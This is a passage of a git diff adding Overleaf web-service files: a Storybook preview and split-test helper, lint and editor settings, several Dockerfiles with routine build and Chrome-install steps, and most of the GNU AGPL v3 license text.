does not (currently) support async loading of "stories". 
Therefore
+// the strategy in frontend/js/i18n.ts does not work (because we cannot wait on
+// the promise to resolve).
+// Therefore we have to use the synchronous method for configuring
+// react-i18next. Because of this, we can only hard-code a single language.
+import i18n from 'i18next'
+import { initReactI18next } from 'react-i18next'
+// @ts-ignore
+import en from '../../../services/web/locales/en.json'
+
+function resetMeta() {
+  window.metaAttributesCache = new Map()
+  window.metaAttributesCache.set('ol-i18n', { currentLangCode: 'en' })
+  window.metaAttributesCache.set('ol-ExposedSettings', {
+    adminEmail: 'placeholder@example.com',
+    appName: 'Overleaf',
+    cookieDomain: '.overleaf.stories',
+    dropboxAppName: 'Overleaf-Stories',
+    emailConfirmationDisabled: false,
+    enableSubscriptions: true,
+    hasAffiliationsFeature: false,
+    hasLinkUrlFeature: true,
+    hasLinkedProjectFileFeature: true,
+    hasLinkedProjectOutputFileFeature: true,
+    hasSamlFeature: true,
+    ieeeBrandId: 15,
+    isOverleaf: true,
+    labsEnabled: true,
+    maxEntitiesPerProject: 10,
+    maxUploadSize: 5 * 1024 * 1024,
+    recaptchaDisabled: {
+      invite: true,
+      login: true,
+      passwordReset: true,
+      register: true,
+      addEmail: true,
+    },
+    sentryAllowedOriginRegex: '',
+    siteUrl: 'http://localhost',
+    templateLinks: [],
+    textExtensions: [
+      'tex',
+      'latex',
+      'sty',
+      'cls',
+      'bst',
+      'bib',
+      'bibtex',
+      'txt',
+      'tikz',
+      'mtx',
+      'rtex',
+      'md',
+      'asy',
+      'lbx',
+      'bbx',
+      'cbx',
+      'm',
+      'lco',
+      'dtx',
+      'ins',
+      'ist',
+      'def',
+      'clo',
+      'ldf',
+      'rmd',
+      'lua',
+      'gv',
+      'mf',
+      'lhs',
+      'mk',
+      'xmpdata',
+      'cfg',
+      'rnw',
+      'ltx',
+      'inc',
+    ],
+    editableFilenames: ['latexmkrc', '.latexmkrc', 'makefile', 'gnumakefile'],
+    validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'],
+    fileIgnorePattern:
+      '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}',
+    projectUploadTimeout: 12000,
+  })
+}
+
+i18n.use(initReactI18next).init({
+  lng: 'en',
+
+  // still using the v3 plural suffixes
+  compatibilityJSON: 'v3',
+
+  resources: {
+    en: { translation: en },
+  },
+
+  react: {
+    useSuspense: false,
+    transSupportBasicHtmlNodes: false,
+  },
+
+  interpolation: {
+    prefix: '__',
+    suffix: '__',
+    unescapeSuffix: 'HTML',
+    skipOnVariables: true,
+    escapeValue: false,
+    defaultVariables: {
+      appName: 'Overleaf',
+    },
+  },
+})
+
+const preview: Preview = {
+  parameters: {
+    // Automatically mark prop-types like onClick, onToggle, etc as Storybook
+    // "actions", so that they are logged in the Actions pane at the bottom of the
+    // viewer
+    actions: { argTypesRegex: '^on.*' },
+    docs: {
+      // render stories in iframes, to isolate modals
+      inlineStories: false,
+    },
+  },
+  globalTypes: {
+    theme: {
+      name: 'Theme',
+      description: 'Editor theme',
+      defaultValue: 'main-',
+      toolbar: {
+        icon: 'circlehollow',
+        items: [
+          { value: 'main-', title: 'Default' },
+          { value: 'main-light-', title: 'Light' },
+        ],
+      },
+    },
+  },
+  loaders: [
+    async () => {
+      return {
+        mainStyle: await import(
+          // @ts-ignore
+          `!!to-string-loader!css-loader!resolve-url-loader!sass-loader!../../../services/web/frontend/stylesheets/bootstrap-5/main-style.scss`
+        ),
+      }
+    },
+  ],
+  decorators: [
+    (Story, context) => {
+      const { mainStyle } = context.loaded
+
+      resetMeta()
+
+      return (
+        <div
+          data-theme={
+            context.globals.theme === 'main-light-' ?
'light' : 'default' + } + > + {mainStyle && <style>{mainStyle.default}</style>} + <Story {...context} /> + </div> + ) + }, + ], +} + +export default preview + +// Populate meta for top-level access in modules on import +resetMeta() diff --git a/services/web/.storybook/utils/with-split-tests.tsx b/services/web/.storybook/utils/with-split-tests.tsx new file mode 100644 index 0000000..0a7ee0b --- /dev/null +++ b/services/web/.storybook/utils/with-split-tests.tsx @@ -0,0 +1,34 @@ +import type { Meta } from '@storybook/react' +import _ from 'lodash' +import { SplitTestContext } from '../../frontend/js/shared/context/split-test-context' + +export const splitTestsArgTypes = { + // to be able to use this utility, you need to add the argTypes for each split test in this object + // Check the original implementation for an example: https://github.com/overleaf/internal/pull/17809 +} + +export const withSplitTests = ( + story: Meta, + splitTests: (keyof typeof splitTestsArgTypes)[] = [] +): Meta => { + return { + ...story, + argTypes: { ...story.argTypes, ..._.pick(splitTestsArgTypes, splitTests) }, + decorators: [ + (Story, { args }) => { + const splitTestVariants = _.pick(args, splitTests) + const value = { splitTestVariants, splitTestInfo: {} } + return ( + <SplitTestContext.Provider value={value}> + <Story /> + </SplitTestContext.Provider> + ) + }, + ...(story.decorators + ? Array.isArray(story.decorators) + ? story.decorators + : [story.decorators] + : []), + ], + } +} diff --git a/services/web/.stylelintrc.json b/services/web/.stylelintrc.json new file mode 100644 index 0000000..09ff0b3 --- /dev/null +++ b/services/web/.stylelintrc.json @@ -0,0 +1,10 @@ +{ + "extends": ["stylelint-config-standard-scss"], + "rules": { + "function-url-quotes": null, + "no-descending-specificity": null, + "scss/at-extend-no-missing-placeholder": null, + "scss/operator-no-newline-after": null, + "property-no-vendor-prefix": [true, { "ignoreProperties": ["mask-image"] }] + } +} diff --git a/services/web/.vscode/settings.json b/services/web/.vscode/settings.json new file mode 100644 index 0000000..133731e --- /dev/null +++ b/services/web/.vscode/settings.json @@ -0,0 +1,7 @@ +{ + "files.exclude": { + "node_modules": true, + "data": true + }, + "cSpell.words": ["docstore", "Tpds"] +} diff --git a/services/web/Dockerfile b/services/web/Dockerfile new file mode 100644 index 0000000..4f5d2e5 --- /dev/null +++ b/services/web/Dockerfile @@ -0,0 +1,83 @@ +# the base image is suitable for running web with /overleaf/services/web bind +# mounted +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/web + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +RUN mkdir -p /overleaf/services/web/data/dumpFolder \ + && mkdir -p /overleaf/services/web/data/logs \ + && mkdir -p /overleaf/services/web/data/pdf \ + && mkdir -p /overleaf/services/web/data/uploads \ + && mkdir -p /overleaf/services/web/data/zippedProjects \ + && mkdir -p /overleaf/services/web/data/projectHistories \ + && chmod -R 0755 /overleaf/services/web/data \ + && chown -R node:node /overleaf/services/web/data + + +# the deps image is used for caching npm ci +FROM base AS deps-prod + +COPY package.json package-lock.json /overleaf/ +COPY services/web/package.json /overleaf/services/web/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && 
NODE_ENV=production npm ci --quiet
+
+FROM deps-prod AS deps
+
+ENV CYPRESS_INSTALL_BINARY=0
+
+COPY tsconfig.backend.json /overleaf/
+RUN cd /overleaf && npm install
+
+
+# the dev image is suitable for running tests
+FROM deps AS dev
+
+ARG SENTRY_RELEASE
+ENV SENTRY_RELEASE=$SENTRY_RELEASE
+COPY services/web /overleaf/services/web
+
+# Build the latex parser
+RUN cd /overleaf/services/web && npm run 'lezer-latex:generate'
+
+USER node
+
+
+# the webpack image has deps+src+webpack artifacts
+FROM dev AS webpack
+USER root
+RUN OVERLEAF_CONFIG=/overleaf/services/web/config/settings.webpack.js nice npm run webpack:production
+
+
+# intermediate image for removing source maps ahead of copying into final production image
+FROM webpack AS webpack-no-sourcemaps
+RUN nice find /overleaf/services/web/public -name '*.js.map' -delete
+
+
+# copy source code and precompile pug templates
+FROM deps-prod AS pug
+COPY services/web /overleaf/services/web
+# Omit Server Pro/CE specific scripts from SaaS image
+RUN rm /overleaf/services/web/modules/server-ce-scripts -rf
+RUN OVERLEAF_CONFIG=/overleaf/services/web/config/settings.overrides.saas.js nice npm run precompile-pug
+
+
+# the web image with only production dependencies but no webpack production build, for development
+FROM pug AS app-only
+USER node
+CMD ["node", "--expose-gc", "app.mjs"]
+
+
+# the final production image, with webpack production build but without source maps
+FROM pug AS app
+ARG SENTRY_RELEASE
+ENV SENTRY_RELEASE=$SENTRY_RELEASE
+COPY --from=webpack-no-sourcemaps /overleaf/services/web/public /overleaf/services/web/public
+USER node
+CMD ["node", "--expose-gc", "app.mjs"]
diff --git a/services/web/Dockerfile.frontend b/services/web/Dockerfile.frontend
new file mode 100644
index 0000000..0bdfd8c
--- /dev/null
+++ b/services/web/Dockerfile.frontend
@@ -0,0 +1,6 @@
+FROM node:20.18.2
+
+# Install Google Chrome
+RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -
+RUN sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
+RUN apt-get update && apt-get install -y google-chrome-stable
diff --git a/services/web/Dockerfile.frontend.ci b/services/web/Dockerfile.frontend.ci
new file mode 100644
index 0000000..140d2bc
--- /dev/null
+++ b/services/web/Dockerfile.frontend.ci
@@ -0,0 +1,11 @@
+ARG PROJECT_NAME
+ARG BRANCH_NAME
+ARG BUILD_NUMBER
+
+FROM ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+
+USER root
+
+RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - && \
+    echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list && \
+    apt-get update && apt-get install -y google-chrome-stable
diff --git a/services/web/LICENSE b/services/web/LICENSE
new file mode 100644
index 0000000..dba13ed
--- /dev/null
+++ b/services/web/LICENSE
@@ -0,0 +1,661 @@
+                    GNU AFFERO GENERAL PUBLIC LICENSE
+                       Version 3, 19 November 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU Affero General Public License is a free, copyleft license for
+software and other kinds of works, specifically designed to ensure
+cooperation with the community in the case of network server software.
+
+  The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works.
By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. 
Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. 
You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. 
+ + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. 
In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file 